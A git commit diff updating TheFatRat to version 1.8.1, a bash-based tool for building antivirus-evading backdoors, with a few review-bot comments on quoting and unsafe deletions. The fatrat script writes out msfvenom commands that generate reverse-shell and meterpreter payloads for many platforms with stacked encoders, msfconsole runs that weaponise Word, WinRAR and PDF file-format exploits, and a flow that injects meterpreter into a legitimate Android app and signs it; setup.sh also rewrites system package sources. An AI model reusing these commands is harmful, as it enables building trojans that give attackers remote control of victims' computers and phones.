Merge pull request #53 from peterpt/master

version update 1.8.1
Edo -maland- 2017-02-27 12:27:12 +07:00 committed by GitHub
commit 133e9049e2
9 changed files with 323 additions and 148 deletions

View File

@ -1,5 +1,9 @@
## CHANGELOG
* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs
* - added more packages instalations needed for non-pentest distribution & some bugs fixed
* v1.8 - add file pumper in TFR
* v1.8 - Backdoor with c program for meterpreter reverse_tcp
* v1.8 - Metasploit staging protocol ( c program )

View File

@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \
backdoor-factory \
monodevelop \
ruby \
apache2
apache2 \
upx-ucl \
xterm \
gnome-terminal \
default-jre \
default-jdk \
unzip \
aapt \
apktool \
dex2jar \
zlib1g-dev \
libmagickwand-dev \
imagemagick \
zipalign
WORKDIR /root/TheFatRat
ADD . ./

View File

@ -3,7 +3,7 @@
#TheFatRat ( Unit for bypass av )
##Update: Version 1.8
##Update: Version 1.8.1
##Codename: Spark
What is TheFatRat ??
@ -87,7 +87,8 @@ And it's up & running.
## :heavy_exclamation_mark: Requirements
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling
Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux )
- Must install metasploit framework

4
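--- a/config/readme.md
+++ b/config/readme.md
@@ -0,0 +1,4 @@
+-----------------------------------------
+|Folder for FatRat configuration files .|
+| Do Not Remove this file . |
+-----------------------------------------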

157
fatrat

@ -22,23 +22,22 @@ white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
path=`pwd`
#Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
resize -s 33 84 > /dev/null
clear
file="config.path"
file="config/config.path"
if [ -f "$file" ]
then
msfconsole=`sed -n 5p config.path`
msfvenom=`sed -n 6p config.path`
backdoor=`sed -n 7p config.path`
searchsploit=`sed -n 8p config.path`
msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p $file`
else
echo "Configuration file does not exists , run setup.sh first ."
echo "Configuration file does not exists , run setup.sh first ."
exit 1
fi
@ -113,7 +112,7 @@ cat << !
# Some Variables
#####################
path=`pwd`
Versi=1.8
Versi=1.8.1
codename=Sparta
OS=`uname` #
distro=`awk '{print $1}' /etc/issue`
@ -135,7 +134,9 @@ out='output/ip.txt'
pump='tools/pump.py'
reverse1='temp/reverse1.c'
stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
###################################################
# CTRL C
###################################################
@ -158,7 +159,7 @@ exit
#########################
#CHECK DEPENDICS
#CHECK DEPENDICIES
#########################
echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies] ;
sleep 2
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
sleep 1
echo [x]::[not root]: you need to be [root] to run this script.;
echo [x]::[not root]: you need to be [root] to run this script.;
echo ""
sleep 1
exit
@ -187,8 +188,8 @@ else
echo [!]::[Check Dependencies]: ;
sleep 1
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
fi
@ -211,7 +212,7 @@ fi
# check apache if exists
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo [✔]::[Apache2 Server $distro ]: installation found!;
echo [✔]::[Apache2 Server $distro ]: installation found!;
else
echo [x]::[warning]:this script require apache2 to work ;
@ -251,12 +252,12 @@ sleep 2
# check if msfvenom exists
which $msfvenom > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo [✔]::[Msfvenom]: installation found!;
echo [✔]::[Msfvenom]: installation found!;
else
echo [x]::[warning]:this script require msfvenom installed to work ;
echo ""
echo [!]::Run setup.sh to install metasploit-framework ;
echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3
exit 1
fi
@ -559,7 +560,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2'
then
@ -574,7 +575,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3'
then
@ -589,7 +590,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4'
then
@ -604,7 +605,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5'
then
@ -619,7 +620,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6'
then
@ -634,7 +635,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7'
then
@ -649,7 +650,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8'
then
@ -664,7 +665,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9'
then
@ -679,7 +680,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10'
then
@ -694,7 +695,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11'
then
@ -709,7 +710,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12'
@ -733,9 +734,9 @@ echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
echo -e $okegreen""
echo -e $yellow" Backdoor doc Saved To output Folder "
echo ""
@ -766,9 +767,9 @@ echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira $path/output/$fira
mv ~/.msf4/local/$fira $path/output/$fira
echo -e $okegreen""
echo -e $yellow" Backdoor Saved To output Folder "
echo ""
@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" &
clear
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear
elif test $fatrat1 == '2' #Windows
then
rm temp/*.rc > /dev/null 2>&1
@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================
echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear
elif test $fatrat1 == '3' #Mac
then
@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear
elif test $fatrat1 == '4' #Android
@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear
elif test $fatrat1 == '5'
@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo ""
echo "Cleaning Temp files"
rm -rf output/*
sleep 2
echo "Done!"
echo -e $okegreen""
sleep 1
echo -ne " SET LHOST : ";tput sgr0
read yourip
echo ""
@ -936,7 +942,22 @@ read yourport
echo ""
echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0
read copyfile
cp $copyfile $path/output/fatrat.apk
cp $copyfile $path/output/fatrat.apk
apkt="$path/output/fatrat.apk"
if [ ! -f $apkt ]; then
echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path "
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
$unzip -l $apkt > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo "[!] Original APK file specified is not valid"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
@ -946,16 +967,36 @@ spinlong
gboor2
spinlong
echo ""
sleep 1
echo "Creating RAT payload with msfvenom"
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk
echo "Done !"
sleep 2
echo "Starting the merging process of RAT with the APK you selected"
echo ""
ruby $apkembed $path/output/fatrat.apk
echo ""
echo ""
ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport
echo ""
cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk
rm -rf $path/output/*
java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk
rm backdoored/apkembed.apk
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) "
echo "Merge completed of Payload with your APK"
sleep 2
cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk
echo "File copied with success to : $path/backdoored"
sleep 2
echo "Removing temporary files from output"
sleep 2
rm -rf $path/output/*
echo "Signing your APK file"
sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk
rm $path/backdoored/apkembed.apk
mv $path/Apk_embed_backdoor.apk $path/backdoored/output/
outapk="$path/backdoored/output/Apk_embed_backdoor.apk"
if [ ! -f $outapk ]; then
echo "[!] APK Rat file was not found in : $path/backdoored/output/"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here :
$path/backdoored/output/Apk_embed_backdoor.apk"
read loveyou
echo
clear
@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
cat powershell_attack.txt
sleep 2
rm unicorn.rc
mv powershell_attack.txt output/$fira.bat
mv powershell_attack.txt output/$fira.bat
echo ""
echo -e $okegreen""
echo -e "Backdoor Saved To output Folder "
@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo " Wait for embed exe to pdf .... "
xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
rm unicorn.rc powershell_attack.txt
echo -e $okegreen""
echo -e $yellow" Backdoor PDF Saved To output Folder "
@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo ' function();'>>$stag
echo ' return 0;'>>$stag
echo '}' >> $stag
$COMPILER $stag -o output/$fira.exe -lws2_32
$COMPILER $stag -o output/$fira.exe -lws2_32
echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $stag
@ -1916,7 +1957,7 @@ menu () {
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
@ -1936,7 +1977,7 @@ menu () {
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku
clear
@ -1956,7 +1997,7 @@ menu () {
elif test $fatrat == '8'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9'
then
@ -2114,7 +2155,7 @@ echo
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
@ -2134,7 +2175,7 @@ echo
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku
clear
@ -2154,7 +2195,7 @@ echo
elif test $fatrat == '8'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9'
then
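Review bot: The cleanup added in the APK-embed hunk runs `rm -rf output/*` relative to whatever directory the script was started from, and the later `rm -rf $path/output/*` expands an unquoted `$path`; the script requires root in its first hunk, so a wrong working directory or a path containing spaces removes unrelated files. Anchoring and guarding both deletions would be safer: `rm -rf -- "${path:?}/output/"*`. The same hunk passes the user-typed `$copyfile` unquoted to `cp` and tests `[ ! -f $apkt ]` unquoted, so `cp -- "$copyfile" "$path/output/fatrat.apk"` and `[ ! -f "$apkt" ]` would cope with spaces and leading dashes. Each new error branch calls `menu` without a following `return`, so if `menu` ever returns, execution continues into the steps the check was meant to stop. The enclosing block starts and ends outside the hunk.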

3
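--- a/logs/readme.md
+++ b/logs/readme.md
@@ -0,0 +1,3 @@
+*******************************************************************************
+* All TheFatRat logs will be stored in this folder , do not delete this file! *
+*******************************************************************************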

View File

@ -1,11 +1,11 @@
#!/bin/bash
file="config.path"
file="config/config.path"
if [ -f "$file" ]
then
msfconsole=`sed -n 5p config.path`
msfvenom=`sed -n 6p config.path`
backdoor=`sed -n 7p config.path`
searchsploit=`sed -n 8p config.path`
msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p $file`
else
echo "Configuration file does not exists , run setup.sh first ."
exit 1
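Review bot: The tool commands are still read from fixed line numbers of a file located through the relative path `config/config.path`, and the new `sed -n 5p $file` leaves `$file` unquoted; nothing checks that the four values are non-empty or that the file is the one setup.sh wrote. fatrat's first hunk carries the same lines and, after requiring root, later runs `$msfvenom` and `$msfconsole` as commands, so whoever can write that file, or cause a different one to be found via the working directory, decides what runs as root. I would resolve the path from the script's own directory, quote it (`msfconsole=$(sed -n 5p "$file")`), and stop with an error when a value is empty or the file is not owned by root. The `if` block closes outside the hunk.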

242
setup.sh

@ -8,11 +8,19 @@ sleep 4s
rm -f /etc/apt/sources.list
mv /etc/apt/sources.list.fatrat /etc/apt/sources.list
echo "Your Original repository list was recovered. ;) ..... beginning setup"
echo ""
echo "Cleaning previous repositories cache & updating your repository ."
sudo apt-get clean && apt-get update -y
sleep 3s
else
echo ""
fi
fi
path=`pwd`
log=$path/logs/setup.log
config=$path/config/config.path
#Removing any previous setup log created
rm -f $log
# setup.sh Author : Edo maland ( Screetsec )
# Install all dependencies nedded
# configuration all file for fixing all problem
@ -20,7 +28,7 @@ fi
#Check root dulu
[[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; }
resize -s 30 73 > /dev/null
resize -s 30 73 > /dev/null 2>&1
clear
@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]"
echo " [ ] Install all dependencies [ ]"
echo " [ ]=================================================[ ]";
echo ""
touch $log
echo "------------------------------------------------------" >> $log
echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log
echo "------------------------------------------------------" >> $log
echo " " >> $log
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Xterm.............................[ found ]"
which xterm >> $log 2>&1
sleep 2
else
echo ""
@ -62,12 +75,14 @@ sleep 2
sudo apt-get install xterm -y
clear
echo "[ ✔ ] Done installing .... "
which xterm >> $log 2>&1
fi
#check if zenity its installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zenity............................[ found ]"
which zenity >> $log 2>&1
sleep 2
else
echo ""
@ -77,18 +92,21 @@ sleep 2
echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y"
echo "[ ✔ ] Done installing .... "
which zenity >> $log 2>&1
fi
# check if gcc exists
which gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gcc compiler......................[ found ]"
which gcc >> $log 2>&1
sleep 2
else
echo "[ X ] gcc compiler -> not found ]"
echo "[ ! ] Installing gcc from your apt sources ]"
xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y"
echo "[ ✔ ] Done installing .... "
which gcc >> $log 2>&1
sleep 2
fi
@ -96,12 +114,14 @@ fi
which i586-mingw32msvc-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Mingw32 Compiler..................[ found ]"
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2
else
echo "[ X ] mingw32 compiler -> not found ]"
echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y"
echo "[ ✔ ] Done installing .... "
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2
fi
@ -109,12 +129,14 @@ fi
which monodevelop > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Monodevelop ......................[ found ]"
which monodevelop >> $log 2>&1
sleep 2
else
echo "[ X ] Monodevelop -> not found ]"
echo "[ ! ] Installing monodevelop from your apt sources ]"
xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y"
echo "[ ✔ ] Done installing ...."
which monodevelop >> $log 2>&1
sleep 2
fi
@ -122,12 +144,14 @@ fi
which ruby > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Ruby .............................[ found ]"
which ruby >> $log 2>&1
sleep 2
else
echo "[ X ] Ruby -> not found ]"
echo "[ ! ] Installing ruby from your apt sources ]"
xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y"
echo "[ ✔ ] Done installing ...."
which ruby >> $log 2>&1
sleep 2
fi
@ -135,12 +159,14 @@ fi
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apache2 ..........................[ found ]"
which apache2 >> $log 2>&1
sleep 2
else
echo "[ X ] Apache2 -> not found ]"
echo "[ ! ] Installing apache2 from your apt sources ]"
xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y"
echo "[ ✔ ] Done installing ...."
which apache2 >> $log 2>&1
sleep 2
fi
@ -150,12 +176,14 @@ fi
which gnome-terminal > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gnome Terminal....................[ found ]"
which gnome-terminal >> $log 2>&1
sleep 2
else
echo "[ X ] Gnome-terminal-> not found ]"
echo "[ ! ] Installing gnome-terminal from your apt sources ]"
xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y"
echo "[ ✔ ] Done installing ...."
which gnome-terminal >> $log 2>&1
sleep 2
fi
@ -163,12 +191,95 @@ fi
which upx > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] UPX Compressor....................[ found ]"
which upx >> $log 2>&1
sleep 2
else
echo "[ X ] Upx compressor -> not found ]"
echo "[ ! ] Installing upx-compressor from your apt sources ]"
xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y"
echo "[ ✔ ] Done installing ...."
which upx >> $log 2>&1
sleep 2
fi
#Checking if keytool exists
which keytool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Keytool (java)....................[ found ]"
which keytool >> $log 2>&1
sleep 2
else
echo "[ X ] Keytool (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y "
echo "[ ✔ ] Done installing ...."
which keytool >> $log 2>&1
sleep 2
fi
#Checking if Jarsigner exists
which jarsigner > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Jarsigner (java)..................[ found ]"
which jarsigner >> $log 2>&1
sleep 2
else
echo "[ X ] Jarsigner (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y "
echo "[ ✔ ] Done installing ...."
which jarsigner >> $log 2>&1
sleep 2
fi
#Checking if Unzip exists
which unzip > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Unzip.............................[ found ]"
which unzip >> $log 2>&1
sleep 2
else
echo "[ X ] Unzip -> not found ]"
echo "[ ! ] Installing Unzip from your apt sources ]"
xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y "
echo "[ ✔ ] Done installing ...."
which unzip >> $log 2>&1
sleep 2
fi
#Checking if Aapt exists
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Aapt..............................[ found ]"
which aapt >> $log 2>&1
sleep 2
else
echo "[ X ] Aapt -> not found ]"
echo "[ ! ] Installing Aapt from your apt sources ]"
xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y "
echo "[ ✔ ] Done installing ...."
which aapt >> $log 2>&1
sleep 2
fi
#Installing dependencies for Zipalign
echo "[ ! ] Installing Zipalign dependencies from your apt sources"
xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y "
echo "[ ✔ ] Done installing ...."
sleep 2
#Checking if Zipalign exists
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zipalign..........................[ found ]"
which zipalign >> $log 2>&1
sleep 2
else
echo "[ X ] Zipalign -> not found ]"
echo "[ ! ] Installing Zipalign from your apt sources "
xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y "
echo "[ ✔ ] Done installing ...."
which zipalign >> $log 2>&1
sleep 2
fi
@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s
echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
sleep 2
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update"
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1
#Checking if apktool exists
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apktool...........................[ found ]"
which apktool >> $log 2>&1
sleep 2
else
echo "[ X ] Apktool -> not found ]"
echo "[ ! ] Installing apktool from Kali repositories ]"
echo "[ X ] Apktool -> not found "
echo "[ ! ] Installing apktool from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y"
echo "[ ✔ ] Done installing ...."
which apktool >> $log 2>&1
sleep 2
fi
#Checking if dex2jar exists
which d2j-jar2dex > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Dex2Jar...........................[ found ]"
which d2j-jar2dex >> $log 2>&1
sleep 2
else
echo "[ X ] Dex2jar -> not found "
echo "[ ! ] Installing dex2jar from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y"
echo "[ ✔ ] Done installing ...."
which d2j-jar2dex >> $log 2>&1
sleep 2
fi
#installing dependencies for ruby script
